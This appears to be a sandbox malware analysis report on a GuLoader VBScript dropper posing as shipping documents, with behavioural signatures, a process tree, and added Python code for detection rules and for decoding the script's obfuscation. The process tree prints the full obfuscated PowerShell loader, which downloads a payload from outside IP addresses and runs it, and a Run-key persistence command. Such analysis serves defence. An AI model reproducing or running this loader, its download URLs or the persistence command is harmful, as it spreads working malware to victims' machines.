Analysis
max time kernel: 160s
max time network: 162s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25/03/2024, 13:15
Static task: static1
Behavioral task: behavioral1
  Sample: awb_shipping_documents_25_03_2024_000000000.vbs
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: awb_shipping_documents_25_03_2024_000000000.vbs
  Resource: win10v2004-20240226-en
General
Target: awb_shipping_documents_25_03_2024_000000000.vbs
Size: 237KB
MD5: 937285e67679dcbd6d3a218cff5723e4
SHA1: 73023fa293fc84f1db845a75a4be3c2337c8da4d
SHA256: d90f3ab705edef2a59cc39b6269f1a149f0f6e43e0aa4f128d05c1697726bcdb
SHA512: 607ea5c0cf19a5776d60c15942c28b5e9433e52f72abad0b250d7abb72f98721210d328c6915051cd9b2fa215a938ed64eebb20de3dc6b9511f2a2fa3cb1b773
SSDEEP: 6144:lyhQMLtOBxJrv5lttSP4KuK8jWwoipSRUiGT9rS2fTicm7jImE9uAI:ekVBDjI
Malware Config
Signatures

Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Blocklisted process makes network request (1 IoC)
flow | pid  | Process
6    | 3768 | WScript.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
description       | ioc                                                                                                  | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | WScript.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description     | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" | reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
pid  | Process
3620 | wab.exe (2 events)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid  | Process
2648 | powershell.exe
3620 | wab.exe

Suspicious use of SetThreadContext (1 IoC)
description                         | pid  | Process        | procid_target
PID 2648 set thread context of 3620 | 2648 | powershell.exe | 117

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTP, 1 IoC)
pid  | Process
1392 | reg.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
pid  | Process
1188 | powershell.exe (3 events)
2648 | powershell.exe (4 events)

Suspicious behavior: MapViewOfSection (1 IoC)
pid  | Process
2648 | powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description             | pid  | Process
Token: SeDebugPrivilege | 1188 | powershell.exe
Token: SeDebugPrivilege | 2648 | powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid  | Process
3620 | wab.exe

Suspicious use of WriteProcessMemory (21 IoCs)
description                       | pid  | Process        | procid_target | events
PID 3768 wrote to memory of 1188  | 3768 | WScript.exe    | 101           | 2
PID 1188 wrote to memory of 4512  | 1188 | powershell.exe | 106           | 2
PID 1188 wrote to memory of 2648  | 1188 | powershell.exe | 107           | 3
PID 2648 wrote to memory of 4296  | 2648 | powershell.exe | 113           | 3
PID 2648 wrote to memory of 3620  | 2648 | powershell.exe | 117           | 5
PID 3620 wrote to memory of 184   | 3620 | wab.exe        | 118           | 3
PID 184 wrote to memory of 1392   | 184  | cmd.exe        | 120           | 3
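The signatures above record the chain as separate IoCs. The following is an added example, not code from the report, the sandbox or the sample: four process-creation rules run over an event list constructed from this report's process tree (PIDs, images and command lines as listed there; the long PowerShell command lines are cut to their start, and the parents of WScript.exe and msedge.exe are not shown in the report, so their ppid is set to 0). The rules cover the script host launching PowerShell, the 64-bit PowerShell relaunching itself under SysWOW64 PowerShell, PowerShell starting wab.exe (the SetThreadContext target in this run), and a REG ADD to HKCU\...\Run with a REG_EXPAND_SZ value that resolves an %environment% variable and pulls its real command from another registry value through Get-ItemProperty, so the Run value alone names neither the interpreter nor the payload. The msedge.exe line is included as benign noise.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# "REG ADD ...\CurrentVersion\Run" anywhere in a command line, so it fires on
# reg.exe itself and on the cmd.exe /c wrapper that launched it.
RUN_KEY_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+\S*currentversion\\run\b", re.I)
ENV_REF = re.compile(r"%[^%\s]+%")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def detect(events):
    """Return (rule, pid) alerts, in event order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = basename(e.image)
        pimage = parent.image.lower() if parent else ""
        pname = basename(pimage)
        # 1. Script host launching PowerShell (WScript.exe 3768 -> powershell.exe 1188).
        if child == "powershell.exe" and pname in SCRIPT_HOSTS:
            alerts.append(("script-host-spawns-powershell", e.pid))
        # 2. 64-bit PowerShell relaunching under SysWOW64 PowerShell (1188 -> 2648);
        #    the stage-1 script does this when [IntPtr]::Size is 8, and the rest
        #    of the chain in this report is 32-bit.
        if (child == "powershell.exe" and pname == "powershell.exe"
                and "\\syswow64\\" in e.image.lower() and "\\system32\\" in pimage):
            alerts.append(("wow64-powershell-relaunch", e.pid))
        # 3. PowerShell starting wab.exe (Windows Contacts), the SetThreadContext
        #    target in this run (2648 -> 3620); wab.exe is not a normal PowerShell child.
        if child == "wab.exe" and pname == "powershell.exe":
            alerts.append(("powershell-spawns-wab", e.pid))
        # 4. Run-key value of type REG_EXPAND_SZ that resolves an %environment%
        #    variable and fetches its real command from another registry value.
        if (RUN_KEY_ADD.search(e.cmdline) and "REG_EXPAND_SZ" in e.cmdline.upper()
                and ENV_REF.search(e.cmdline) and "get-itemproperty" in e.cmdline.lower()):
            alerts.append(("run-key-expand-sz-indirection", e.pid))
    return alerts


# The reg.exe command line from this report's process tree.
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"'''

# Constructed from the process tree in this report: PIDs, images and command
# lines as listed there (long PowerShell command lines cut to their start;
# the parents of WScript.exe and msedge.exe are not shown, so ppid is 0).
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(3768, 0, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"'),
    ProcEvent(1188, 3768, PS64, f'"{PS64}" "<#Patchy Corporis Vergaloo #>;'),
    ProcEvent(4512, 1188, r"C:\Windows\system32\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"'),
    ProcEvent(2648, 1188, PS32, f'"{PS32}" "<#Patchy Corporis Vergaloo #>;'),
    ProcEvent(4296, 2648, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"'),
    ProcEvent(3620, 2648, r"C:\Program Files (x86)\windows mail\wab.exe", r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(184, 3620, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    ProcEvent(1392, 184, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
    ProcEvent(3836, 0, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService'),
]

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:<32} pid={pid}")
```

Rule 4 matches on the command line rather than on the image, so it fires on both the cmd.exe wrapper (PID 184) and reg.exe (PID 1392); on real telemetry that is the behaviour you want, since either process may be the only one logged.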
Processes
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3768
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1188
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"3⤵PID:4512
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"4⤵PID:4296
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3620
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"5⤵
- Suspicious use of WriteProcessMemory
PID:184
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:1392
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:81⤵PID:3836
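Both powershell.exe command lines above hide every real character behind one junk character, and the script's own Tulipa function strips the junk at run time. The following is an added example, not code from the report or the sample: a Python re-implementation of that routine, run over literals copied verbatim from the command line above (constructed test input; only a subset of the literals). With $Forkhead at the value `cmd /c echo 1` yields, the routine recovers iex, Transferring (the BITS JobState the download loop waits on), the SysWOW64 PowerShell path the script relaunches itself under when [IntPtr]::Size is 8, and a '>'-separated list of two download URLs that the script rotates through with Start-BitsTransfer until a file appears at $env:appdata\Judicial.Ara; the remaining statements base64-decode that file, take the 23400-character slice starting at offset 291186 and hand it to iex. Only the test values are asserted; the other decodings are what this routine gives on the page's literals.

```python
import re

# Matches the script's own literal form, Tulipa '<obfuscated>' (assumption:
# single-quoted PowerShell strings with no quote characters inside, as here).
TULIPA_CALL = re.compile(r"Tulipa\s+'([^']*)'")


def tulipa(s: str, width: int = 1) -> str:
    """Re-implementation of the sample's Tulipa function (added example).

    The original walks $Uri from 1 while $Uri -lt Length-1, stepping by 2, and
    appends Substring($Uri, $Forkhead) each time. $Forkhead is the "1" that
    `cmd /c echo 1` prints, so the script keeps every second character: real
    text interleaved with one junk character. If the nonsense path
    'reservats:\\Forfaldt\\Tiptipoldemoders' existed, $Forkhead-- would make
    the width 0 and every string would decode to "": a cheap check against
    emulators that report success for any New-Item.
    """
    return "".join(s[i:i + width] for i in range(1, len(s) - 1, 2))


# Obfuscated literals copied verbatim from the powershell.exe command line in
# the process tree above (constructed test input for this example; a subset).
LITERALS = {
    "Agillawood224": " i,eRxE ",
    "Outfound": ".TSr a n,s fVeSr,rDi,nDg, ",
    "Monochordist": r"A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ",
    "Strangler": ".hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ",
    "first_Forefather": " $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ",
}


def decode_literals(cmdline: str):
    """Decode every Tulipa '...' literal in a command line, in script order."""
    return [tulipa(lit) for lit in TULIPA_CALL.findall(cmdline)]


def payload_urls(strangler_decoded: str):
    """The script splits the decoded $Strangler on [char]62 ('>') into a list
    and rotates through it with $Precompiler++ % count while no file appears."""
    return strangler_decoded.split(chr(62))


def next_url(urls, attempt: int) -> str:
    return urls[attempt % len(urls)]


if __name__ == "__main__":
    for name, lit in LITERALS.items():
        print(f"{name:>16}: {tulipa(lit)!r}")
    for n, url in enumerate(payload_urls(tulipa(LITERALS["Strangler"]))):
        print(f"download candidate {n}: {url}")
```

To decode a full command line, paste the whole `powershell.exe` argument string into `decode_literals`; the order of the decoded statements is the order the script executes them, and the `$Forkhead` width check explains the two `cmd.exe /c "echo 1 && exit"` children (PIDs 4512 and 4296) in the process tree.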
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82